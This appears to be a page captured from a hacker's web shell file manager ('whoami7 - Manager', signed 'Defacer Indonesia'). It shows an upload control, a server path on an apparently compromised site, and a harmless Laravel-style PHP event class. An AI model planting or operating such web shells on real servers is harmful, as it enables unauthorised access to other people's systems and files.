whoami7 - Manager
:
/
home
/
qbizpnmr
/
test.qbiztax.com
/
app
/
Events
/
Auth
/
Upload File:
files >> //home/qbizpnmr/test.qbiztax.com/app/Events/Auth/Attempting.php
<?php namespace App\Events\Auth; use App\Abstracts\Event; class Attempting extends Event { public $alias; public $company_id; public $protocol; /** * Create a new event instance. * * @param $alias * @param $company_id * @param $protocol */ public function __construct($alias, $company_id = null, $protocol = 'basic') { $this->alias = $alias; $this->company_id = $company_id; $this->protocol = $protocol; } }
Copyright ©2021 || Defacer Indonesia